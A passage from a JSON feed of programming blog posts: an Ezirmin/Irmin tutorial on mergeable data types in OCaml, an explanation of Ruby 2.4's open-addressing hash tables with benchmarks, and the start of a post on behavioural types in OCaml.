here\nReferences\nhttps:\u002F\u002Fgithub.com\u002Frack\nhttp:\u002F\u002Fwww.kavinder.com\u002Fblog\u002F2014-10-10-rebuild-a-gem-rack\u002F\nhttp:\u002F\u002Fwww.kavinder.com\u002Fblog\u002F2014-10-10-rebuild-a-gem-rack\u002F",[],{"slug":2654,"title":2655,"link":2656,"pubDate":2657,"contentSnippet":2658,"tags":2659,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"an-easy-interface-to-irmin-library","Ezirmin : An easy interface to the Irmin library","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Firmin\u002Fcrdt\u002F2017\u002F02\u002F15\u002Fan-easy-interface-to-irmin-library\u002F","2017-02-15T13:46:00.000Z","Ezirmin is an easy interface over the\nIrmin, a library database for building\npersistent mergeable data structures based on the principles of Git. In this\npost, I will primarily discuss the Ezirmin library, but also discuss some of the\nfiner technical details of mergeable data types implemented over Irmin.\nContents\nContents\nIrmin and Ezirmin\nQuick tour of Ezirmin    \nMerge semantics\nWorking with history\nReacting to changes\nInteraction with remotes\nMergeable persistent data types    \nIrmin Architecture\nUser-defined merges\nMergeable Counters        \nTheory of merges\nRecursive merges\nMergeable logs        \nEfficient mergeable logs\nMergeable ropes\nNext steps\nIrmin and Ezirmin\nIrmin is a library for manipulating persistent mergeable data structures\n(including CRDTs) that follows the same principles of Git. In particular, it has\nbuilt-in support for snapshots, branches and reverts, and can compile to\nmultiple backends. Being written in pure OCaml, apps written using Irmin, as\nwell as running natively, can run in the browsers or be compiled to Unikernels.\nA good introduction to the capabilities of Irmin can be found in the Irmin\nREADME file.\nOne of the downsides to being extremely configurable is that the Irmin library\nis not beginner friendly. In particular, the library tends to be rather functor\nheavy, and even simple\nuses require\nmultiple functor instantiations1. The primary goal of Ezirmin is to\nprovide a defuntorized interface to Irmin, specialized to useful defaults.\nHowever, as I’ve continued to build Ezirmin, it has come to include a collection\nof useful mergeable data types including counters, queues, ropes, logs, etc. I\nwill spend some time describing some of the interesting aspects of these data\nstructures.\nQuick tour of Ezirmin\nYou can install the latest version of Ezirmin by\n\n$ git clone https:\u002F\u002Fgithub.com\u002Fkayceesrk\u002Fezirmin\n$ cd ezirmin\n$ opam pin add ezirmin .\n\n\nStable versions are also available through OPAM:\n\n$ opam install ezirmin\n\n\nLet’s fire up utop and get started:\n\n$ utop\nutop # #require \"ezirmin\";;\nutop # open Lwt.Infix;;\n\n\nWe’ll create a mergeable queue of strings using the Git file system backend\nrooted at \u002Ftmp\u002Fezirminq:\n\nutop # module M = Ezirmin.FS_queue(Tc.String);; (* Mergeable queue of strings *)\nutop # open M;;\nutop # let m = Lwt_main.run (init ~root:\"\u002Ftmp\u002Fezirminq\" ~bare:true () >>= master);;\nval m : branch = \u003Cabstr>\n\n\nm is the master branch of the repository. Ezirmin exposes a key value store,\nwhere keys are hierarchical paths and values are whatever data types is stored in\nthe repo. In this case, the data type is a queue. Let’s push some elements into\nthe queue:\n\nutop # push m [\"home\"; \"todo\"] \"buy milk\";;\n- : unit = ()\nutop # push m [\"work\"; \"todo\"] \"publish ezirmin\";;\n- : unit = ()\nutop # to_list m [\"home\"; \"todo\"];;\n- : string list = [\"buy milk\"]\n\n\nThe updates to the queue is saved in the Git repository at \u002Ftmp\u002Fezirminq. In\nanother terminal,\n\n$ utop\nutop # #require \"ezirmin\";;\nutop # module M = Ezirmin.FS_queue(Tc.String);; (* Mergeable queue of strings *)\nutop # open M;;\nutop # open Lwt.Infix;;\nutop # let m = Lwt_main.run (init ~root:\"\u002Ftmp\u002Fezirminq\" ~bare:true () >>= master);;\nval m : branch = \u003Cabstr>\nutop # pop m [\"home\"; \"todo\"];;\n- : string option = Some \"buy milk\"\n\n\nFor concurrency control, use branches. In the first terminal,\n\nutop # let wip = Lwt_main.run @@ clone_force m \"wip\";;\nutop # push wip [\"home\"; \"todo\"] \"walk dog\";;\n- : unit = ()\nutop # push wip [\"home\"; \"todo\"] \"take out trash\";;\n- : unit = ()\n\n\nThe changes are not visible until the branches are merged.\n\nutop # to_list m [\"home\"; \"todo\"];;\n- : string list = []\nutop # merge wip ~into:m;;\n- : unit = ()\nutop # to_list m [\"home\"; \"todo\"];;\n- : string list = [\"walk dog\"; \"take out trash\"]\n\n\nMerge semantics\nWhat should be the semantics of popping the queue at home\u002Ftodo concurrently\nat the master branch and wip branch? It is reasonable to ascribe exactly once\nsemantics to pop such that popping the same element on both branches and\nsubsequently merging the queues would lead to a merge conflict. However, a more\nuseful semantics is where we relax this invariant and allow elements to be\npopped more than once on different branches. In particular, the merge operation\non the queue ensures that:\nAn element popped in one of the branches is not present after the merge.\nMerges respect the program order in each of the branches.\nMerges converge.\nHence, our merge queues are CRDTs.\nWorking with history\nIrmin is fully compatible with Git. Hence, we can explore the history of the\noperations using the git command line. In another terminal:\n\n$ cd \u002Ftmp\u002Fezirminq\n$ git lg\n* e75da48 - (4 minutes ago) push - Irmin xxxx.cam.ac.uk.[73126] (HEAD -> master, wip)\n* 40ed32d - (4 minutes ago) push - Irmin xxxx.cam.ac.uk.[73126]\n* 6a56fb0 - (5 minutes ago) pop - Irmin xxxx.cam.ac.uk.[73221]\n* 6a2cc9a - (6 minutes ago) push - Irmin xxxx.cam.ac.uk.[73126]\n* 55f7fc8 - (6 minutes ago) push - Irmin xxxx.cam.ac.uk.[73126]\n\n\nThe Git log shows that there have been 4 pushes and 1 pop in this repository.\nIn addition to the data structures being mergeable, they are also persistent.\nIn particular, every object stored in Irmin has complete provenance. You can\nalso manipulate history using the Git command line.\n\n$ git reset HEAD~2 --hard\n$ git lg\n* e75da48 - (8 minutes ago) push - Irmin xxxx.cam.ac.uk.[73126] (wip)\n* 40ed32d - (9 minutes ago) push - Irmin xxxx.cam.ac.uk.[73126]\n* 6a56fb0 - (9 minutes ago) pop - Irmin xxxx.cam.ac.uk.[73221] (HEAD -> master)\n* 6a2cc9a - (10 minutes ago) push - Irmin xxxx.cam.ac.uk.[73126]\n* 55f7fc8 - (10 minutes ago) push - Irmin xxxx.cam.ac.uk.[73126]\n\n\nBack in the first terminal:\n\nutop # to_list m [\"home\"; \"todo\"];;\n- : string list = []\n\n\nSince we rolled back the master to before the pushes were merged, we see an\nempty list. Ezirmin also provides APIs for working with history\nprogrammatically.\n\nutop # let run = Lwt_main.run;;\nutop # let repo = run @@ init ();;\nutop # let path = [\"Books\"; \"Ovine Supply Logistics\"];;\nutop # let push_msg = push m ~path;;\n\nutop # begin\n  push_msg \"Baa\" >>= fun () ->\n  push_msg \"Baa\" >>= fun () ->\n  push_msg \"Black\" >>= fun () ->\n  push_msg \"Camel\"\nend;;\n\nutop # to_list m path;;\n- : string list = [\"Baa\"; \"Baa\"; \"Black\"; \"Camel\"]\n\n\nClearly this is wrong. Let’s fix this by reverting to earlier version:\n\nutop # let m_1::_ = run @@ predecessors repo m;; (** HEAD~1 version *)\nutop # to_list m_1 path;;\n- : string list = [\"Baa\"; \"Baa\"; \"Black\"]\nutop # update_branch m ~set:m_1;;\nutop # to_list m path;;\n- : string list = [\"Baa\"; \"Baa\"; \"Black\"]\n\n\nNow that we’ve undone the error, we can do the right thing.\n\nutop # push_msg \"Sheep\";;\nutop # run @@ to_list m path;;\n- : string list = [\"Baa\"; \"Baa\"; \"Black\"; \"Sheep\"]\n\n\nReacting to changes\nEzirmin supports watching a particular key for updates and invoking a callback\nfunction when there is one.\n\nutop # let cb _ = Lwt.return (print_endline \"callback: update to home\u002Ftodo\");;\nutop # watch m [\"home\"; \"todo\"] cb\n\n\nThe code above installs a listener cb on the queue at home\u002Ftodo, which is\nrun every time the queue is updated. This includes local push and pop\noperations as well as updates due to merges.\n\nutop # push m [\"home\"; \"todo\"] \"hang pictures\";;\ncallback: update to home\u002Ftodo\n- : unit = ()\n\n\nInteraction with remotes\nUnlike distributed data stores, where the updates are disseminated\ntransparently between the replicas, Ezirmin provides you the necessary building\nblocks for building your own dissemination protocol. As with Git, Ezirmin\nexposes the functionality to push2 and pull changes from remotes.\n\n#show_module Sync;;\nmodule Sync : sig\n  type remote\n  val remote_uri : string -> remote\n  val pull : remote -> branch -> [ `Merge | `Update ] -> [ `Conflict of string | `Error | `No_head | `Ok ] Lwt.t\n  val push : remote -> branch -> [ `Error | `Ok ] Lwt.t\nend\n\n\nThis design provides the flexibility to describe your own network layout, with\nanti-entropy mechanisms built-in to the synchronization protocol. For example,\none might deploy the replicas in a hub-and-spoke model where each replica\naccepts client writes locally and periodically publishes changes to the master\nand also fetches any latest updates. The data structures provided by Ezirmin\nare always mergeable and converge. Hence, the updates are never rejected. It is\nimportant to note that even though we have a centralized master, this\ndeployment is still highly available. Even if the master is unavailable, the\nother nodes can still accept client requests. The replicas may also be\nconnected in a peer-to-peer fashion without a centralized master for a more\nresilient deployment.\nMergeable persistent data types\nEzirmin is equipped with a growing\ncollection of mergeable\ndata types. The mergeable datatypes occupy a unique position in the space of\nCRDTs. Given that we have the history, the design of mergeable datatypes is much\nsimpler. Additionally, this also leads to richer\nstructures typically not found in CRDTs.\nIt is worth studying them in detail.\nIrmin Architecture\nIrmin provides a high-level key-value interface built over two lower level\nheaps: a block store and a tag store. A block store is an append-only\ncontent-addressable store that stores serialized values of application contents,\nprefix-tree nodes, history meta-data, etc. Instead of using physical memory\naddress of blocks, the blocks are identified by the hash of their contents. As a\nresult block store enjoys very nice properties. Being content-addressed, we get\nsharing for free: two blocks with the same content will have the have the same\nhash. This not only applies for individual blocks, but also for\nlinked-structures. For example,\n  \nThe linked list above is uniquely identified by hash h0 since h0 was\ncomputed from the content a and the hash of the tail of the list h1. No\nother list has hash h0. Changing c to C in this list would result in a\ndifferent hash for the head of the list3. Moreover, since the block\nstore is append-only, all previous versions of a application-level data\nstructure is also available, and thus providing persistence. This also makes for\na nice concurrency story for multiple processes\u002Fthreads operating on the block\nstore. The absence of mutations on block store mean that no additional\nconcurrency control mechanisms are necessary.\nThe only mutable part of the Irmin architecture is the tag store, that maps\nglobal names to blocks in the block store. The notion of branches are built on\ntop of the tag store. Cloning a branch creates a new tag that points to the same\nblock as the cloned branch.\nUser-defined merges\nThe real power of Irmin is due to the user-defined merges. Irmin expects the\ndeveloper to provide a 3-way merge function with the following signature:\n\ntype t\n(** User-defined contents. *)\n\nval merge : old:t -> t -> t -> [`Ok of t | `Conflict of string]\n(** 3-way merge. *)\n\n\nGiven the common ancestor old and the two versions, merge function can either\nreturn a successful merge or mark a conflict. It is up to the developer to ensure\nthat merges are commutative (merge old a b = merge old b a) and that the merge\ncaptures the intent of the two branches. If the merge function never conflicts,\nwe have CRDTs.\nMergeable Counters\nThe simplest mergeable data type is a counter with an increment and decrement\noperations. Given that we have a 3-way merge function, the merge is intuitive:\n\n\nGiven the two new values for the counter t1 and t2, and their lowest common\nancestor value old, the new value of the counter is the sum of the old value\nand the two deltas: old + (t1 - old) + (t2 - old) = t1 + t2 - old.\nTheory of merges\nWhile this definition is intuitive, the proof of why this strategy (i.e.,\ncomputing deltas and applying to the common ancestor) is correct is quite\nsubtle. It happens to be the case that the patches (deltas) in this case,\nintegers under addition, form an abelian\ngroup. Judah Jacobson formalizes\npatches for Darcs as inverse\nsemigroups and proves\nconvergence. Every abelian group is also an inverse semigroup. Hence, the above\nstrategy is correct. Merges can also be equivalently viewed as a pushout in\ncategory theory, leading to the same\nresult. I will have to save the discussion of the category theoretic reasoning\nof Irmin merges for another time. But Liam O’Connor has written a concise\npost on the theory of patches\nwhich is worth a read.\nRecursive merges\nSince Ezirmin allows arbitrary branching and merging, the lowest common ancestor\nneed not be unique. One way to end up with multiple lowest common ancestors is\ncriss-cross merges. For example, consider the history graph below:\n  \nThe counter at some key in the master was initially 0. The branch wip was\ncloned at this point. The counter is incremented by 1 at master and 2 at\nwip. At this point, both branches are merged into the other branch. The common\nancestor here is the initial state of counter 0. This results in counter value\nof 3 in both branches. Suppose there are further increments, 2 at master\nand 4 at wip, resulting in counter values 5 and 7 respectively in\nmaster and wip.\nIf the wip branch is now merged in master, there are two lowest common\nancestors: the commit with value 1 at master and 2 in wip. Since the 3-way\nmerge algorithm only work for a single common ancestor, the we adopt a recursive\nmerge strategy, where the lowest common ancestors are first merged resulting in\na internal commit with value 3 (represented by a dotted circle). This commit\nis now used as the common ancestor for merging, which results in 9 as the new\nstate of the counter. This matches the increments done in both branches. The\nrecursive merge strategy is also the default merge strategy for Git.\nMergeable logs\nAnother useful data type is mergeable\nlogs, where each log message\nis a string. The merge operation accumulates the logs in reverse chronological\norder. To this end, each log entry is a pair of timestamp and message, and the\nlog itself is a list of entries. They are constructed using\nmirage-tc:\n\n\nThe merge function extracts the newer entries from either branches, sorts them\nand appends to the front of the old list.\n\n\nWhile this implementation is simple, it does not scale well. In particular, each\ncommit stores the entire log as a single serialized blob. This does not take\nadvantage of the fact that every commit can share the tail of the log with its\npredecessor. Moreover, every append to the log needs to deserialize the entire\nlog, append the new entry and serialize the log again. Hence, append is an\nO(n) operation, where n is the size of the log. Merges are also worst case\nO(n). This is undesirable.\nEfficient mergeable logs\nWe can implement a efficient logs\nby taking advantage of the fact that every commit shares the tail of the log\nwith its predecessor.\n\ntype log_entry = {\n  time    : Time.t;\n  message : V.t;        (** V.t is type of message. *)\n  prev    : K.t option  (** K.t is the type of address in the block store. *)\n}\n\n\nMerges simply add a new node which points to the logs of merged branches,\nresulting in a DAG that captures the causal history. The following sequence of\noperations:\n\nutop # #require \"ezirmin\";;\nutop # open Lwt.Infix;;\nutop # module M = Ezirmin.Memory_log(Tc.String);;\nutop # open M;;\nutop # let m = Lwt_main.run (init () >>= master);;\nutop # Lwt_main.run (\n  append m [] \"m0\" >>= fun _ ->\n  append m [] \"m1\" >>= fun _ ->\n  clone_force m \"wip\" >>= fun w ->\n  append w [] \"w0\" >>= fun _ ->\n  append m [] \"m2\" >>= fun _ ->\n  merge w ~into:m >>= fun _ ->\n  append w [] \"w1\" >>= fun _ ->\n  append w [] \"w2\" >>= fun _ ->\n  append m [] \"m3\" >>= fun _ ->\n  append m [] \"m4\"\n);;\n\n\nresults in the heap below.\n  \nRead traverses the log in reverse chronological order.\n\nutop # read_all m [];;\n- : string list = [\"m4\"; \"m3\"; \"m2\"; \"w0\"; \"m1\"; \"m0\"]\n\n\nThis implementation has O(1) appends and O(1) merges, resulting in much\nbetter performance. The graph below compares the blob log implementation and\nthis linked implementation with file system backend by performing repeated\nappends to the log and measuring the latency for append.\n  \nEach point represents the average latency for the previous 100 appends. The\nresults show that the append latency for linked implementation remains\nrelatively constant while the blob implementation slows down considerably with\nincreasing number of appends. Additionally, the linked implementation also\nsupports efficient paginated\nreads.\nMergeable ropes\nA rope data structure is used for efficiently storing and manipulating very long\nstrings. Ezirmin provides mergeable\nropes where for arbitrary\ncontents, but also\nspecialized for strings.\nRopes automatically rebalance to maintain the invariant that the height of the\ntree is proportional to the length of the contents. The crux of the merge\nstrategy is that given a common ancestor and the two trees to be merged,\nthe merge algorithm works out the smallest subtrees where the modification\noccurred. If the modifications are on distinct subtrees, then the merge is\ntrivial.\n  \nIf the modification is on the same subtree, then the algorithm delegates to\nmerge the contents. This problem has been well studied under the name of\noperational\ntransformation (OT).\nOT can be categorically explained in terms of pushouts.\nMergeable strings with insert, delete and replace operations are isomorphic to\ncounters with increment and decrement. We apply a similar strategy to merge\nstring.\n\n\nFirst we compute the diff between the common ancestor and the new tree using\nWagner-Fischer\nalgorithm. Then\nwe transform one patch with respect to the other using standard OT definition\nsuch that we can first apply one of the original patch to the common ancestor\nand then apply the transformed patch of the other branch to get the result tree.\nFor example,\n\nutop # #require \"ezirmin\";;\nutop # open Lwt.Infix;;\nutop # open Ezirmin.Memory_rope_string;;\nutop # let m = Lwt_main.run (init () >>= master);;\nutop # let t = Lwt_main.run (\n  make \"abc\" >>= fun t ->\n  write m [] t >>= fun _ ->\n  Lwt.return t\n);;\nutop # let w = Lwt_main.run (clone_force m \"w\");;\nutop # let _ = Lwt_main.run (\n  set t 1 'x' >>= fun t' (* \"axc\" *) ->\n  write m [] t' >>= fun _ ->\n\n  insert t 1 \"y\" >>= fun t' (* \"aybc\" *)->\n  write w [] t' >>= fun _ ->\n\n  merge w ~into:m >>= fun _ (* \"ayxc\" *) ->\n  merge m ~into:w\n);;\nutop # Lwt_main.run (\n  read m [] >>= function\n  | None -> failwith \"impossible\"\n  | Some r -> flush r >|= fun s ->\n  Printf.printf \"m is \\\"%s\\\"\\n\" s\n);;\n- : unit = ()\nm is \"ayxc\"\nutop # Lwt_main.run (\n  read w [] >>= function\n  | None -> failwith \"impossible\"\n  | Some r -> flush r >|= fun s ->\n  Printf.printf \"w is \\\"%s\\\"\\n\" s\n)\n- : unit = ()\nw is \"ayxc\"\n\n\nThe combination of mergeable ropes with OT gets the best of both worlds.\nCompared to a purely OT based implementation, diffs are only computed if updates\nconflict at the leaves. The representation using ropes is also efficient in\nterms of storage where multiple versions of the tree shares blocks. A purely\nrope based implementation either has the option of storing individual characters\n(atoms) at the leaves (and resolve conflicts based on some deterministic\nmechanism such as timestamps or other deterministic strategies) or manifest the\nconflict at the leaves to the user to get it resolved. A simple strategy might\nbe to present both of the conflicting strings, and ask the user to resolve it.\nHence, mergeable ropes + OT is strictly better than either of the approaches.\nNext steps\nEzirmin is open to comments and contributions. Next steps would be:\nImplement more mergeable data types\nImplement generic mergeable datatypes using depyt.\nExplore the data types which admit conflicts. For example, a bank account with\nnon-negative balance does not form a CRDT with a withdraw operation. However,\noperations such as deposit and accrue_interest can be coordination-free.\nFootnotes\nThings are indeed improving with a cleaner API in the 1.0 release. ↩\nPush is currently broken. But given that Irmin is compatible with git, one can use git-push to publish changes. ↩\nThe same principle underlies the irrefutability of blockchain. No block can be changed without reflecting the change in every subsequent block. ↩",[],{"slug":2661,"title":2662,"link":2663,"pubDate":2664,"contentSnippet":2665,"tags":2666,"maintainerName":1639,"maintainerUsername":1640,"maintainerPhoto":77,"feedUrl":1641},"behind-scenes-hash-table-performance-ruby-2-4-html","Behind the scenes of hash table performance in ruby 2.4","https:\u002F\u002Faboobacker.in\u002F2017\u002F01\u002F30\u002Fbehind-scenes-hash-table-performance-ruby-2-4.html","2017-01-30T04:00:13.000Z","Ruby 2.4 got released this Christmas with lot of exciting features. One of the most underrated features in ruby 2.4 is hash table improvements. Before going into details about implementation, let’s first check the benchmark to know how this change gonna affect your ruby application.\nGetting keys and values of a hash\n\nh = {}\n\n10000.times do |i|\n  h[i] = nil\nend\n\n# Get all hash values\nBenchmark.measure { 50000.times { h.values } }\n\n# Get all hash keys\nBenchmark.measure { 50000.times { h.keys } }\n\n\nRuby 2.3\n\n=> #\u003CBenchmark::Tms:0x00000002a0f990 @label=\"\", @real=2.8023432340005456, @cstime=0.0, @cutime=0.0, @stime=0.13000000000000012, @utime=2.6799999999999997, @total=2.8099999999999996>\n#\u003CBenchmark::Tms:0x00000002963398 @label=\"\", @real=2.767410662000657, @cstime=0.0, @cutime=0.0, @stime=0.029999999999999805, @utime=2.729999999999997, @total=2.7599999999999967>\n\n\nRuby 2.4\n\n#\u003CBenchmark::Tms:0x0000000226d700 @label=\"\", @real=0.8854832770002758, @cstime=0.0, @cutime=0.0, @stime=0.08999999999999997, @utime=0.7999999999999998, @total=0.8899999999999998>\n#\u003CBenchmark::Tms:0x000000022b1018 @label=\"\", @real=0.8476084579997405, @cstime=0.0, @cutime=0.0, @stime=0.06999999999999995, @utime=0.7799999999999994, @total=0.8499999999999993>\n\n\nthe above two operations executed ~ 3 times faster on my laptop. Though these numbers can vary with your machine and processor, the performance improvements will be significant on all modern processors. Not all operations became 3 times faster , average perfomence improvement is more than 50%.\nHash Table\n\nIn computing, hash table (hash map) is a data structure that is used to implement an associative array, a structure that can map keys to values. Hash table uses a hash function to compute an index into an array of buckets or slots, from which the desired value can be found. Wikipedia\n\n\nIn other words, it is a data structure that allows you to store key value pair and helps to fetch specific data using the key in an efficient way. Unlike arrays, you don’t have to iterate through all elements to find a given element in the hash. If you are new to this data structure, check this s50 for the better understanding.\n\nhash = {key1: value1, key2: value2}\n\n\nPre Ruby 2.4\nLet’s first check how ruby implemented Hash in pre 2.4 old hash representation , hash table\n\nRuby internally uses a structure called st_table to represent hash. st_table contains type, the number of bins, the number of entries and pointers to bin array. Bin array is an array with 11 default size and can grow when required. Let’s take an example of hash and see how it will be represented using above diagram.\n\nsample_hash = {a: 10, b: 20, c: 30, d: 40, e: 50}\n\n\nLet’s take keys :c and :d\nStep 1:\nFirst thing ruby does is it will take the hash of the key using the internal hash function.\n\n2.3.1 :075 > :c.hash\n=> 2782\n2.3.1 :076 > :d.hash\n=> 2432\n\n\nStep 2:\nAfter getting the hash value, result ?it  takes modulo of 11 to get figure in which bin ruby can store the given pair\n\n2.3.1 :073 > :c.hash % 11\n=> 10\n2.3.1 :074 > :d.hash % 11\n=> 1\n\n\nThis means we can put :c => 30 in 10’th bin and :d in 1st bin\nStep 3\nWhat if there are multiple modulo operations that give the same result? This is called hash collision. To resolve this, ruby uses a separate chaining approach  i.e, it will make a doubly linked list and add it to the existing value in the bin\nStep 4\nWhat if the hash is too large ?? Linked list will start growing and will make the hash slower. So, ruby will allocate more bins and do an operation called Rehashing to utilise newly added bins.\nImprovements in 2.0\nIn ruby 2.0, Ruby eliminated the need for extra data structures for smaller hashes and uses linear search for better performance.\nImprovements in 2.2\nIn 2.2.0, Ruby has used bin array sizes that correspond to powers of two (16, 32, 64, 128, …).\nChanges in 2.4\nnew hash structure in ruby 2.4 , hash table\n\nSource: https:\u002F\u002Fgithub.com\u002Fruby\u002Fruby\u002Fblob\u002Ftrunk\u002Fst.c\nIn ruby 2.4, Hash table is moved to open addressing model i.e, we no longer have the separate doubly linked list for collision resolution. Here, we will be storing records in the entries array itself i.e, there is no need of pointer chasing and data will be stored in the adjacent memory location (Data locality). The hash table has two arrays called bins and entries. Entry array contains hash entries in the order of insertion and the bin array provides access to entry the by their keys. The key hash is mapped to a bin containing the index of the corresponding entry in the entry array.\nInserting entries in Hash\nStep 1:\nRuby will insert an entry to entries array in sequential order.\nStep 2:\nRuby will identify the bin from which the entry is to be mapped. Ruby uses first few bits of the hash as the bin index, Explaining the whole process is beyond the scope of this article. You can check the logic in MRI source code here\nAccessing element by key\nLet’s examine it with a sample hash **\n\nsample_hash = {a: 10, b: 20, c: 30, d: 40, e: 50}\n\n\nHere, ruby will create two internal arrays, entries and bins as shown below\n\nentries = [[2297,a,10], [451,b,20], [2782,c,30], [2432,d,40],[1896,e,50]]\n\n\neach record in entries array will contain a hash, key, and value respectively\nDefault bin size in ruby is 16 so Bins array for the above hash will be somewhat like this\n\nbins = [\n3,\nnil,\nnil,\nnil,\n1,\nnil,\nnil,\nnil,\n5,\n0,\nnil,\nnil,\nnil,\nnil,\n2,\nnil\n]\n\n\nNow what if we want to fetch an element from hash, say ‘c’\n\nsample_hash[:c]\n\n\nStep 1:\nFind the hash using ruby’s internal hash function\n\n:c.hash\n2782\n\n\nStep 2\nFind the location in bin array by using find bin method\n\nfind_bin(2782)\n\n\nStep 3\nFind the location entries array using bin array\n\nbins[14] => 2\n\n\nStep 4. Find the entry using the key we got\n\nentries[2] => [2782,c,30]\n\n\nDeleting an item\nNow we have value for the key ‘c’ without iterating through all the records\nDeleting an item\nIf the item to be deleted is first one, then ruby will change the index of ‘current first entry ‘, otherwise ruby will mark the item as reserved using a reserved hash value.\nIn the ruby source code, DELETED is marked using 0 and EMPTY is marked using 1.\nTo summarise this approach made hash implementation in ruby faster because the new bins array stores much smaller reference to the entries instead of storing entries themselves. Hence, it can take advantage of the modern processor caching levels\n** Small hashes will use the linear search to find entries from ruby 2.0 onwards to avoid extra overhead and improve performance. Given example is just for reference only.\nReferences\nhttps:\u002F\u002Fbugs.ruby-lang.org\u002Fissues\u002F12142\nhttps:\u002F\u002Fblog.heroku.comruby-2-4-features-hashes-integers-rounding#hash-changes\nhttps:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FHash_table\nhttp:\u002F\u002Fpatshaughnessy.net\u002Fruby-under-a-microscope",[],{"slug":2668,"title":2669,"link":2670,"pubDate":2671,"contentSnippet":2672,"tags":2673,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"behavioural-types","Behavioural types","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Ftypes\u002F2016\u002F06\u002F30\u002Fbehavioural-types\u002F","2016-06-30T09:31:00.000Z","Behavioural types such as session types, contracts and choreography describe the\nbehaviour of a software entity as a sequence of operations on a resource such\nas a communication channel, web service session or a file descriptor.\nBehavioural types capture well-defined interactions, which are enforced\nstatically with the help of type system machinery. In this post, I will describe\na lightweight embedding of behavioural types in OCaml using polymorphic variants\nthrough a series of examples. The complete source code for the examples is\navailable\nhere.\nThe idea of encoding behavioural types using polymorphic variants comes from\nFuSe, which is a\nsimple library implementation of binary sessions in OCaml. Similar to FuSe\nlinear use of resources is enforced through dynamic checks in the following\nexamples. We’ll raise LinearityViolation when linearity is violated.\n\nexception LinearityViolation\n\n\nRefs that explain their work\nLet us define a ref type that is constrained not only by the type of value\nthat it can hold but also by the sequence of operations that can be performed\non it.\n\nmodule type Ref =\nsig\n  type ('a, 'b) ref constraint 'b = [>]\n\n  val ref   : 'a -> ('a, 'b) ref\n  val read  : ('a, [`Read of 'b]) ref -> 'a * ('a, 'b) ref\n  val write : ('a, [`Write of 'b]) ref -> 'a -> ('a, 'b) ref\nend\n\nmodule Ref : Ref = struct ... end\n\n\nThe phantom type variable 'b constrained to be a polymorphic variant ('b =\n[>]) describes the sequence of permitted operations. For example, a reference\ncan only be read when the type presents the read capability [`Read of 'b].\nHere, the 'b represents the behaviour of the continuation. Consequently, the\nresult of the read operation is a tuple consisting of the value read and a\nreference whose type is ('a,'b) ref. It is useful to think of the read\noperation as changing the type of the reference. The type for write is\nsimilar.\nAssociating behaviours with references is quite handy. For example, below is a\nreference that holds an integer, which can only be written once following which\na single read is permitted:\n\nlet my_ref1 : (int, [`Write of [`Read of [`Stop]]]) Ref.ref = Ref.ref 10\n\n\nThe behavioural types are also automatically inferred. For example,\n\nutop # let foo1 r =\n  let r = Ref.write r 20 in\n  Ref.read r;;\nval foo1 :\n  (int, [ `Write of [ `Read of [>  ] as 'a ] ]) Ref.ref ->\n  int * (int, 'a) Ref.ref\n\n\nThe inferred type says that foo1 writes into r and then reads it. We can\napply foo1 on my_ref1 as their behaviours are compatible.\n\nutop # let v,res_ref = foo1 my_ref1;;\nval v : int = 20\nval res_ref : (int, [ `Stop ]) Ref.ref\n\n\nRecursive behavioural types are obtained painlessly.\n\nutop # let rec foo2 r =\n  let r = Ref.write r 20 in\n  let v, r = Ref.read r in\n  foo2 r;;\nval foo2 : (int, [ `Write of [ `Read of 'a ] ] as 'a) Ref.ref -> 'b\n\n\nThe inferred types says that foo2 repeatedly writes and then reads the given\nreference. Incompatible references are rejected statically. For example,\n\nutop # let my_ref2 : (int, [`Write of [`Read of [`Stop]]]) Ref.ref = Ref.ref 10;;\nval my_ref2 : (int, [ `Write of [ `Read of [ `Stop ] ] ]) Ref.ref = \u003Cabstr>\nutop # let _ = foo2 my_ref2;;\nError: This expression has type\n         (int, [ `Write of [ `Read of [ `Stop ] ] ]) Ref.ref\n       but an expression was expected of type\n         (int, [ `Write of [ `Read of 'a ] ] as 'a) Ref.ref\n       These two variant types have no intersection\n\n\nwhereas\n\nutop # let my_ref3 = Ref.ref 10;;\nval my_ref3 : (int, _[>  ]) Ref.ref = \u003Cabstr>\nutop # let _ = foo2 my_ref3;;\n\n\nis accepted and runs forever. It is (sometimes) useful to write programs that\ndon’t always run forever such as foo3:\n\nutop # let rec foo3 r = function\n  | 0 ->\n      print_endline \"done\";\n      Ref.read r\n  | n ->\n      let r = Ref.write r 20 in\n      let v, r = Ref.read r in\n      foo3 r (n-1);;\n\n\nwhich runs for n iterations, where it performs a write and a read in every\niteration but the last one where it just performs a read. Unfortunately, this\nprogram does not type check:\n\nError: This expression has type ('a, [ `Read of [>  ] ]) Ref.ref\n       but an expression was expected of type ('a, [ `Write of [>  ] ]) Ref.ref\n       These two variant types have no intersection\n\n\nThe problem is that the behaviour of the two branches are incompatible, and the\nprogram is rightly rejected. We distinguish the branches in the type using:\n\nval branch : ('a, [>] as 'b) ref -> (('a, [>] as 'c) ref -> 'b) -> ('a, 'c) ref\n\n\nbranch r f indicates branch selection in r where f is a function that is\nalways of the form fun x ->  `Tag x. The fixed version of foo3 is:\n\nutop # let rec foo3 r = function\n  | 0 ->\n      print_endline \"done\";\n      Ref.write (Ref.branch r (fun x -> `Zero x)) 0\n  | n ->\n      let r = Ref.write (Ref.branch r (fun x -> `Succ x)) 20 in\n      let v, r = Ref.read r in\n      foo3 r (n-1);;\nval foo3 :\n  (int,\n   [> `Succ of (int, [ `Write of [ `Read of 'a ] ]) Ref.ref\n    | `Zero of (int, [ `Write of [>  ] as 'b ]) Ref.ref ]\n   as 'a)\n  Ref.ref -> int -> (int, 'b) Ref.ref = \u003Cfun>\n\n\nObserve that the inferred type captures the branching behaviour, and works as\nexpected:\n\nutop # let my_ref4 = Ref.ref 10 in foo3 my_ref4 32;;\ndone\n- : (int, _[>  ]) Ref.ref = \u003Cabstr>\n\n\nImplementation\nThe implementation is unremarkable except for the machinery to dynamically\nenforce linearity.\n\nmodule Ref : Ref =\nstruct\n\n  type ('a, 'b) ref =\n    {contents     : 'a;\n     mutable live : bool} (* For linearity *)\n     constraint 'b = [>]\n\n  let ref v = {contents = v; live = true}\n\n  let check r =\n    if not r.live then raise LinearityViolation;\n    r.live \u003C- false\n\n  let fresh r = {r with live = true}\n\n  let read r =\n    check r;\n    (r.contents, fresh r)\n\n  let write r v =\n    check r;\n    { contents = v; live = true }\n\n  let branch r _ = check r; fresh 